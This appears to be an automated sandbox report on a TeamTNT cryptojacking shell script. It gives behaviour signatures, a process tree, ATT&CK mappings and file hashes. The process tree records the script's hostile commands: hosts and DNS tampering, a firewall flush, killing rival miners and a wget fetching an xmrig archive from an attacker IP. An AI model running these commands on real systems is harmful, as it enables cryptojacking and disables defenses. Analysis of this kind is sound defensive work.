Analysis
-
max time kernel
65s -
max time network
144s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
-
submitted
29-12-2024 23:10
General
-
Target
SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh
-
Size
27KB
-
MD5
0da186f3e1f8c89c5fbe5672cbdf05b6
-
SHA1
a917ab4301ab25749d6e867a1812e61b3b09df3f
-
SHA256
f82ea98d1dc5d14817c80937b91b381e9cd29d82367a2dfbde60cfb073ea4316
-
SHA512
25c6afd296b855f8d230389479b95ac079b51a084b38ef7a9a2747024fae8d4441f45b2fb45071f59835868a3b31d7fab2549244be43a09942a5fc07240f7f1d
-
SSDEEP
384:ckWWRItydlaRM07lT2wDi/Y5vWCr7Q2K3v/lts1dIxRsnJEbOU89WV/:ckWcItYlaxlT2wDGWvWCrzPoRfOPO/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 1 IoCs
-
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.
-
OS Credential Dumping 1 TTPs 1 IoCs
Adversaries may attempt to dump credentials to use it in password cracking.
-
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Deletes log files 1 TTPs 1 IoCs
Deletes log files on the system.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 7 IoCs
-
Reads CPU attributes 1 TTPs 2 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Process Discovery 1 TTPs 2 IoCs
Adversaries may try to discover information about running processes.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 35 IoCs
Malware often drops required files in the /tmp directory.
-
Software Deployment Tools 1 TTPs 4 IoCs
Use software deployment tools to execute code.
Processes
-
/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh"/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Kubernetes_root_PayLoad_2.sh"1⤵
- Modifies hosts file
- Writes DNS configuration
- Write file to user bin folder
- Writes file to tmp directory
-
/bin/unameuname -m2⤵
-
-
/bin/unameuname -m2⤵
-
-
/bin/unameuname -m2⤵
-
-
/bin/hostnamehostname2⤵
-
-
/bin/pidofpidof /usr/sbin/.configure/xmrig2⤵
- Reads runtime system information
-
-
/bin/grepgrep "45.9.148.108 chimaera.cc" /etc/hosts2⤵
-
-
/bin/grepgrep chimaera /etc/hosts2⤵
-
-
/bin/grepgrep "45.9.148.108 teamtnt.red" /etc/hosts2⤵
-
-
/bin/grepgrep teamtnt /etc/hosts2⤵
-
-
/bin/grepgrep "nameserver 8.8.8.8\\|nameserver 8.8.4.4" /etc/resolv.conf2⤵
-
-
/bin/grepgrep nameserver /etc/resolv.conf2⤵
-
-
/bin/sedsed -i /nameserver/d /etc/resolv.conf2⤵
-
-
/bin/grepgrep "nameserver 8.8.8.8" /etc/resolv.conf2⤵
-
-
/bin/grepgrep "nameserver 8.8.4.4" /etc/resolv.conf2⤵
-
-
/usr/bin/apt-getapt-get update --fix-missing2⤵
- Reads runtime system information
- Writes file to tmp directory
- Software Deployment Tools
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/usr/lib/apt/methods/https/usr/lib/apt/methods/https3⤵
-
-
/usr/lib/apt/methods/https/usr/lib/apt/methods/https3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/usr/lib/apt/methods/gpgv/usr/lib/apt/methods/gpgv3⤵
-
-
/usr/lib/apt/methods/gpgv/usr/lib/apt/methods/gpgv3⤵
- Writes file to tmp directory
-
/usr/bin/apt-key/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.CTElIA /tmp/apt.data.VGFJZj4⤵
- Writes file to tmp directory
-
/usr/bin/apt-configapt-config shell MASTER_KEYRING APT::Key::MasterKeyring5⤵
- Reads runtime system information
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell REMOVED_KEYS APT::Key::RemovedKeys5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Dir::Etc::Trusted/f5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell GPGV Apt::Key::gpgvcommand5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/bin/mktempmktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX5⤵
-
-
/bin/chmodchmod 700 /tmp/apt-key-gpghome.ZGSEzM1uV75⤵
-
-
/bin/readlinkreadlink -f /tmp/apt-key-gpghome.ZGSEzM1uV75⤵
-
-
/bin/rmrm -f /tmp/apt-key-gpghome.ZGSEzM1uV7/pubring.gpg5⤵
-
-
/usr/bin/touchtouch /tmp/apt-key-gpghome.ZGSEzM1uV7/pubring.gpg5⤵
- Writes file to tmp directory
-
-
/usr/bin/apt-configapt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/bin/readlinkreadlink -f /etc/apt/trusted.gpg.d/5⤵
-
-
/usr/bin/findfind /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"5⤵
-
-
/usr/bin/sortsort5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg5⤵
-
-
/bin/cpcp -a /tmp/apt-key-gpghome.ZGSEzM1uV7/pubring.gpg /tmp/apt-key-gpghome.ZGSEzM1uV7/pubring.orig.gpg5⤵
- Writes file to tmp directory
-
-
/bin/sedsed -e "s#'#'\"'\"'#g"5⤵
-
-
/bin/sedsed -e "s#'#'\"'\"'#g"5⤵
-
-
/usr/bin/gpgvgpgv --homedir /tmp/apt-key-gpghome.ZGSEzM1uV7 --keyring /tmp/apt-key-gpghome.ZGSEzM1uV7/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.CTElIA /tmp/apt.data.VGFJZj5⤵
-
-
/usr/bin/gpgconfgpgconf --kill gpg-agent5⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent --no-autostart KILLAGENT6⤵
-
-
-
/bin/rmrm -rf /tmp/apt-key-gpghome.ZGSEzM1uV75⤵
-
-
-
/usr/bin/apt-key/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /var/lib/apt/lists/archive.debian.org_debian_dists_stretch_Release.gpg /var/lib/apt/lists/archive.debian.org_debian_dists_stretch_Release4⤵
- Writes file to tmp directory
-
/usr/bin/apt-configapt-config shell MASTER_KEYRING APT::Key::MasterKeyring5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell REMOVED_KEYS APT::Key::RemovedKeys5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
- Reads runtime system information
-
-
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell TRUSTEDFILE Dir::Etc::Trusted/f5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell GPGV Apt::Key::gpgvcommand5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/bin/mktempmktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX5⤵
-
-
/bin/chmodchmod 700 /tmp/apt-key-gpghome.aXbWu2xFxJ5⤵
-
-
/bin/readlinkreadlink -f /tmp/apt-key-gpghome.aXbWu2xFxJ5⤵
-
-
/bin/rmrm -f /tmp/apt-key-gpghome.aXbWu2xFxJ/pubring.gpg5⤵
-
-
/usr/bin/touchtouch /tmp/apt-key-gpghome.aXbWu2xFxJ/pubring.gpg5⤵
- Writes file to tmp directory
-
-
/usr/bin/apt-configapt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/bin/readlinkreadlink -f /etc/apt/trusted.gpg.d/5⤵
-
-
/usr/bin/findfind /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"5⤵
-
-
/usr/bin/sortsort5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg5⤵
-
-
/bin/catcat /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg5⤵
-
-
/bin/cpcp -a /tmp/apt-key-gpghome.aXbWu2xFxJ/pubring.gpg /tmp/apt-key-gpghome.aXbWu2xFxJ/pubring.orig.gpg5⤵
- Writes file to tmp directory
-
-
/bin/sedsed -e "s#'#'\"'\"'#g"5⤵
-
-
/bin/sedsed -e "s#'#'\"'\"'#g"5⤵
-
-
/usr/bin/gpgvgpgv --homedir /tmp/apt-key-gpghome.aXbWu2xFxJ --keyring /tmp/apt-key-gpghome.aXbWu2xFxJ/pubring.gpg --ignore-time-conflict --status-fd 3 /var/lib/apt/lists/archive.debian.org_debian_dists_stretch_Release.gpg /var/lib/apt/lists/archive.debian.org_debian_dists_stretch_Release5⤵
-
-
/usr/bin/gpgconfgpgconf --kill gpg-agent5⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent --no-autostart KILLAGENT6⤵
-
-
-
/bin/rmrm -rf /tmp/apt-key-gpghome.aXbWu2xFxJ5⤵
-
-
-
/usr/bin/apt-key/usr/bin/apt-key --quiet --readonly --keyring /etc/apt/keyrings/nodesource.gpg verify --status-fd 3 /tmp/apt.sig.mxmih6 /tmp/apt.data.z8Lpez4⤵
- Writes file to tmp directory
-
/usr/bin/apt-configapt-config shell MASTER_KEYRING APT::Key::MasterKeyring5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
- Reads runtime system information
-
-
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell REMOVED_KEYS APT::Key::RemovedKeys5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI5⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/usr/bin/apt-configapt-config shell GPGV Apt::Key::gpgvcommand5⤵
- Reads runtime system information
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures6⤵
-
-
-
/bin/mktempmktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX5⤵
-
-
/bin/chmodchmod 700 /tmp/apt-key-gpghome.Bsas2zMLkY5⤵
-
-
/bin/sedsed -e "s#'#'\"'\"'#g"5⤵
-
-
/bin/sedsed -e "s#'#'\"'\"'#g"5⤵
-
-
/usr/bin/gpgvgpgv --homedir /tmp/apt-key-gpghome.Bsas2zMLkY --keyring /etc/apt/keyrings/nodesource.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.mxmih6 /tmp/apt.data.z8Lpez5⤵
-
-
/usr/bin/gpgconfgpgconf --kill gpg-agent5⤵
-
/usr/bin/gpg-connect-agentgpg-connect-agent --no-autostart KILLAGENT6⤵
-
-
-
/bin/rmrm -rf /tmp/apt-key-gpghome.Bsas2zMLkY5⤵
-
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
-
/usr/bin/apt-getapt-get install -y bc2⤵
- Deletes log files
- Reads runtime system information
- Writes file to tmp directory
- Software Deployment Tools
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http3⤵
-
-
/bin/sh/bin/sh -c "/usr/sbin/dpkg-preconfigure --apt || true"3⤵
-
/usr/sbin/dpkg-preconfigure/usr/sbin/dpkg-preconfigure --apt4⤵
- OS Credential Dumping
-
/usr/local/sbin/localelocale charmap5⤵
-
-
/usr/local/bin/localelocale charmap5⤵
-
-
/usr/sbin/localelocale charmap5⤵
-
-
/usr/bin/localelocale charmap5⤵
-
-
/bin/shsh -c "stty -a 2>/dev/null"5⤵
-
/bin/sttystty -a6⤵
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"5⤵
-
/bin/sttystty -a6⤵
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"5⤵
-
/bin/sttystty -a6⤵
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"5⤵
-
/bin/sttystty -a6⤵
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"5⤵
-
/bin/sttystty -a6⤵
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"5⤵
-
/bin/sttystty -a6⤵
-
-
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --assert-multi-arch3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --status-fd 14 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/bc_1.06.95-9+b3_mipsel.deb3⤵
- Write file to user bin folder
-
/usr/local/sbin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/bc_1.06.95-9+b3_mipsel.deb4⤵
- System Network Configuration Discovery
-
-
/usr/local/bin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/bc_1.06.95-9+b3_mipsel.deb4⤵
- System Network Configuration Discovery
-
-
/usr/sbin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/bc_1.06.95-9+b3_mipsel.deb4⤵
- System Network Configuration Discovery
-
-
/usr/bin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/bc_1.06.95-9+b3_mipsel.deb4⤵
- System Network Configuration Discovery
- Software Deployment Tools
-
-
/usr/local/sbin/dpkg-debdpkg-deb --control /var/cache/apt/archives/bc_1.06.95-9+b3_mipsel.deb /var/lib/dpkg/tmp.ci4⤵
-
-
/usr/local/bin/dpkg-debdpkg-deb --control /var/cache/apt/archives/bc_1.06.95-9+b3_mipsel.deb /var/lib/dpkg/tmp.ci4⤵
-
-
/usr/sbin/dpkg-debdpkg-deb --control /var/cache/apt/archives/bc_1.06.95-9+b3_mipsel.deb /var/lib/dpkg/tmp.ci4⤵
-
-
/usr/bin/dpkg-debdpkg-deb --control /var/cache/apt/archives/bc_1.06.95-9+b3_mipsel.deb /var/lib/dpkg/tmp.ci4⤵
-
/usr/local/sbin/tartar -x -f - "--warning=no-timestamp"5⤵
-
-
/usr/local/bin/tartar -x -f - "--warning=no-timestamp"5⤵
-
-
/usr/sbin/tartar -x -f - "--warning=no-timestamp"5⤵
-
-
/usr/bin/tartar -x -f - "--warning=no-timestamp"5⤵
-
-
/sbin/tartar -x -f - "--warning=no-timestamp"5⤵
-
-
/bin/tartar -x -f - "--warning=no-timestamp"5⤵
-
-
-
/usr/local/sbin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/bc_1.06.95-9+b3_mipsel.deb4⤵
-
-
/usr/local/bin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/bc_1.06.95-9+b3_mipsel.deb4⤵
-
-
/usr/sbin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/bc_1.06.95-9+b3_mipsel.deb4⤵
-
-
/usr/bin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/bc_1.06.95-9+b3_mipsel.deb4⤵
-
-
/usr/local/sbin/rmrm -rf -- /var/lib/dpkg/tmp.ci4⤵
-
-
/usr/local/bin/rmrm -rf -- /var/lib/dpkg/tmp.ci4⤵
-
-
/usr/sbin/rmrm -rf -- /var/lib/dpkg/tmp.ci4⤵
-
-
/usr/bin/rmrm -rf -- /var/lib/dpkg/tmp.ci4⤵
-
-
/sbin/rmrm -rf -- /var/lib/dpkg/tmp.ci4⤵
-
-
/bin/rmrm -rf -- /var/lib/dpkg/tmp.ci4⤵
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --status-fd 14 --configure --pending3⤵
- Software Deployment Tools
-
/var/lib/dpkg/info/bc.postinst/var/lib/dpkg/info/bc.postinst configure4⤵
- Executes dropped EXE
-
/usr/bin/whichwhich update-menus5⤵
-
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
-
/bin/cpcp /usr/bin/curl /usr/sbin/C_hg_curl2⤵
- Write file to user bin folder
-
-
/bin/chmodchmod +x /usr/sbin/C_hg_curl2⤵
- File and Directory Permissions Modification
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/bin/grepgrep -i "[a]liyun"2⤵
-
-
/bin/grepgrep -i "[y]unjing"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
-
/bin/mkdirmkdir -p /usr/sbin/.configure/2⤵
-
-
/bin/systemctlsystemctl stop account_daemons.service2⤵
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl stop moneroocean_miner.service2⤵
- Enumerates kernel/hardware configuration
-
-
/usr/bin/killallkillall -9 xmrig2⤵
- Reads runtime system information
-
-
/usr/bin/killallkillall -9 xmrigMiner2⤵
- Reads runtime system information
-
-
/bin/rmrm -rf /usr/sbin/moneroocean/2⤵
-
-
/bin/rmrm -rf /usr/bin/moneroocean/2⤵
-
-
/bin/rmrm -rf /usr/sbin/moneroocean/2⤵
-
-
/usr/bin/nprocnproc2⤵
-
-
/bin/sleepsleep 22⤵
-
-
/bin/rmrm -f "/usr/sbin/.configure/*.json"2⤵
-
-
/bin/catcat2⤵
-
-
/bin/sedsed -r "s/[^a-zA-Z0-9\\-]+/_/g"2⤵
- Reads runtime system information
-
-
/usr/bin/cutcut -f1 -d.2⤵
-
-
/bin/hostnamehostname2⤵
-
-
/bin/sedsed -i "s/\"pass\": *\"[^\"]*\",/\"pass\": \"debian9-mipsel-20240729-en-0\",/" /usr/sbin/.configure/config.json2⤵
- Write file to user bin folder
- System Network Configuration Discovery
-
-
/bin/cpcp /usr/sbin/.configure/config.json /usr/sbin/.configure/config_background.json2⤵
- Write file to user bin folder
- Reads runtime system information
-
-
/bin/sedsed -i "s/\"background\": *false,/\"background\": true,/" /usr/sbin/.configure/config_background.json2⤵
- Write file to user bin folder
-
-
/usr/bin/wgetwget -q http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/.../xmr/kuben3/i386.tar.gz -O /usr/sbin/.configure/xmrig.tar.gz2⤵
- Write file to user bin folder
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Disable or Modify System Firewall
1Indicator Removal
1Clear Linux or Mac System Logs
1Credential Access
Adversary-in-the-Middle
1OS Credential Dumping
1/etc/passwd and /etc/shadow
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19B
MD5fe0b86955e4eb444f17f54d086580b1f
SHA1e19182dd3a1465bda3aa2e1a63067bec82dd5ad3
SHA256be102039b1dc4747490c6994ca8dc17d12d32219561f8ba23e8c0b865ac223ed
SHA5126e03176e423005c87c6c7b2ec4e90c46639d4311839a980317102a10445bc563e1c9e288605d6d5b18fadd32563c4c0ae2284f6016a54c81e5a97fa7c3cd5a26
-
Filesize
38B
MD5c7ea09d26e26605227076e0514a33038
SHA1c3f9736e9af7bd0885578859a50b205c8fa5fc8e
SHA2567e8ad76e0d200e93918ca2e93c99ff8ecd02071953bf1479819db3ac0dbb6d07
SHA51217d0088725eb9991e9eb82e8a3de0878e45e6f394bbc2ad260aa59c786ff0ad565e145e21256425d1c0abe15f3ecb402ebb0a6a5e1c2d5ba7a4d95ec93a2861f
-
Filesize
71B
MD54a502d34c9274bf20ac5781ec24f97d5
SHA1524c16347caa1e4e4c89fe3a397248a4059be41c
SHA25611f70f1f445376846199cd886a909f58a5eca110d2539720b1b938410836514d
SHA51293ef1e10a3d08717b72b129dced28bd24adf1f94b86631b53ab15b5156b0c1b692962ce29c53f3ce9ef08b42a12db213927f1b1bca4a3f534de8f3ea7441a1bf
-
Filesize
82B
MD5c3d0eb21be23e940d1ae67e60493982b
SHA1e236a6ab6d464669ac8fdf6bd8a73d9c2645ae25
SHA2566431d183913fdb81feb4e002aba1ae9e4fda28ef84373b085cbd425cf4731daa
SHA512cbf2eb9a783d009fa80b2052b4e7be8bc918a5ebeab20d421ebc60d3f50a924ba3b4ff32a33f526cc522bd82df5be40a7d7f6ca7c95b993f47adc49fad372801
-
Filesize
7KB
MD5b53e6ca4ed295fc38621315853f623d0
SHA145a416f014809735ec88854a3540c8e9e89eb102
SHA2566246307cc0130f6bd52510a477960f7c7be431b25979d7e20a88dc2fac58ac93
SHA51230b5d2571840c2319a4af3907afda8ab00cf2879c83aaee1048ca972c0d3ddbf7995a167a31b19c45195b636ab46e73b0534459c6ee79c557fac8bfc01d857ac
-
Filesize
15KB
MD52713b38b3d7345961d8b80f4463483b8
SHA1e6ec76aaebfea6a82f7984b57e07522a20365201
SHA256389d00b5cbd2f69f32065448000a0607aec056e39af958f62e89c4c7e6228248
SHA512ecee7b3045f49f7fa7443a8658602817bb2c8d2d07ae930536e3f2daaa5854903bf339af6c2fd4b02f8627f050ce360d2feddcf40569b58d304cfc459f418978
-
Filesize
18KB
MD5760d3ab91f417958475b9a6342a5b92e
SHA1137a06aea4b5c9e9ca11f0f5f1225da1c275c334
SHA25642b348802c4290af6f9f30f984513f22fdd342ac3561ccb82957561a6b7c291f
SHA5126cefcfae1c95c94b66b46d9242e62ddf7d7c65bd8d9bc9dc4e4c6230443ba33668ed160e1882f48a0b5daf59a46ccca09240ebe666017f059bd55e02fb1f2db6
-
Filesize
23KB
MD5d63fbab9dfb826d53f7b3aaea45dbfb5
SHA159841d8e5423f788292af76d4350a948f4e25f53
SHA256de329f1f48b751a7527f8ce3150452a4282ce69990e9318ab82d5b46b9f751ca
SHA51220118f98c87eb60f0abafd5b4c2ffb4b1faf92777ee7402b98c0f5dc42d492c83f94d6903bdeee006187ac344a57afeaa84b54a973b483ff13e49773071d8198
-
Filesize
47KB
MD5a4dc094481f22304cab5550218e6e4de
SHA1f5886a324c0c026d0168656f23d1d898a0e43bd6
SHA256eef8c4d7d518a986e4f1cfeec729b55369b863ed6b62a23cbe9d88aa56de5391
SHA5120f040c957db3d500ba18315db33cca6eb18f9c80d952710f839833a73dd89b72e2e01178084c17348e312a427a6b9150937199b4912e71dfd1a7e2dd43723f68
-
Filesize
82B
MD5b965bef02b450058c92dc9a6e64e8a98
SHA141abcc61c38ff30ab2fef6ba8f14658a5d105aac
SHA25675436eeab437664d4f19627de0111a5d229b552b198c49d2b66745115bc7f6ae
SHA5128757275d55012d175d795e01d377e0d24fb5880cfff98e9f835ce360cdffb27640547f0bd7138bf17d063a8323f3a2eb6d79f0ce1bc6d6d1bc67b0e87033f622
-
Filesize
7KB
MD568a3db30571fd296864e1a96d085c4a6
SHA16415c2071b24a25cb32acb4c6a5c06c49a294ce3
SHA256d2c9064dd497a1140c32ea97f078b97c0dc1ab5456b12e47f4dcae1cdf45c083
SHA51223a10eae5143cf04f292c988518300ee979760b63b7acf8ab2d40c486ac958ba5326c1c58f15c1e0ca7950cbc05d1841143597a5493da0a0f6f8c2e0220802ed
-
Filesize
56KB
MD5fd96c8ce5d0ef18d63bbe9ae17bb2659
SHA176b284743d95d3546df9d85c09712c830a30f614
SHA256ffc8a7a283b61633aac383ddf8f863df3f39ef241a07a4127f51a2495ef674b3
SHA5122486acdfc102f8f8498d8db2f205915115444dd118507369044202dc9a97109b4c738a2faf16c1f5ce5e4452ae0af17ae4691ac3bf5e7c5e2db271c0f40a4cb2
-
Filesize
1KB
MD570274ce622b0cc437ef7f0caddc9d232
SHA1124513a3ad2eb5aafa9be0920681e3bb8625979b
SHA2564055d2ccc7c4be062ed390944548206ece5ed7613eae114b9e53ef15f3905230
SHA512fed0054da258bb4a99e8adac359322d9ecc67caeee872309ea7d9863db6a1ec2a55497100e31538f42b43b9efc997e779e3774c8a0c6b0206254d7252d8699c8
-
Filesize
4KB
MD5ca530ff912cb1a57246c9b11a6db5dbe
SHA167fe585886fcbf5169cb1fa56f85864edc5e9f14
SHA2560db9d6dbd1c03ad2ab7b41adaabd82919dc829a28f444e9ec68173e83d4c6aa7
SHA5126c85b33f1dcb1abec7e7121f3ac45d6dd6dd75ed03f6bed956545d7e1feb9512766efee27d1015fa27d013fa73e0521d76f79b972b9d8b630ff26172609b1038
-
Filesize
4KB
MD56f5f12b9aab59646024a835c4d3b2941
SHA197d382bdeb13751bbff42442ae51413e4462499e
SHA2560292179b087ca3a9d7c5d05353692be8521dafd06f8d1e4826c10c00c56c4a2d
SHA512eb4d87fe4674942e7ec57249a0c4009f545a307258de73cd628974b6995c7393a99615b0caca20f44af731a9c63e78ffcc029eb1b37b59d1a5359d40c3681850
-
Filesize
186KB
MD57bca13eb125880aa2615ae9f836ac7fd
SHA1884a53c9f84f5b57735da52e2672aa46e282567a
SHA256e3c97425e53915f35f1e8315b39d827714c81142a8e6899b7d45cefa9a31f6af
SHA51245dc3f8d7ef327785ded043dfe981c9d4eb1faabc1362ad634e3c7795f0f925a9c9b2842d1f8cc19bc125c0d71b42365cb2ad669d2543d2b9bcad6b3c782d1c4
-
Filesize
102KB
MD56b54f6bfe955a1f608d36ded7c2b67c3
SHA1654d6a949e7f27066039bb930b2c2c6e51ab8107
SHA25641266e18ea42393a2808e86d56fb9d02d110bf11915a2679e880b85476ac302a
SHA512944a7a6faed6f0dce77d0f00f0371b6c6c05b622e6866913ef3aaa21425758ddb2f6d0e1d71d7558183db39f08397af6ec515736996989e95c74477f0a9012b4
-
Filesize
403KB
MD503264491d9a1e209585409ab7ed81865
SHA1c1081bac6729bfcc5cf183691bb3d5777ae0ff80
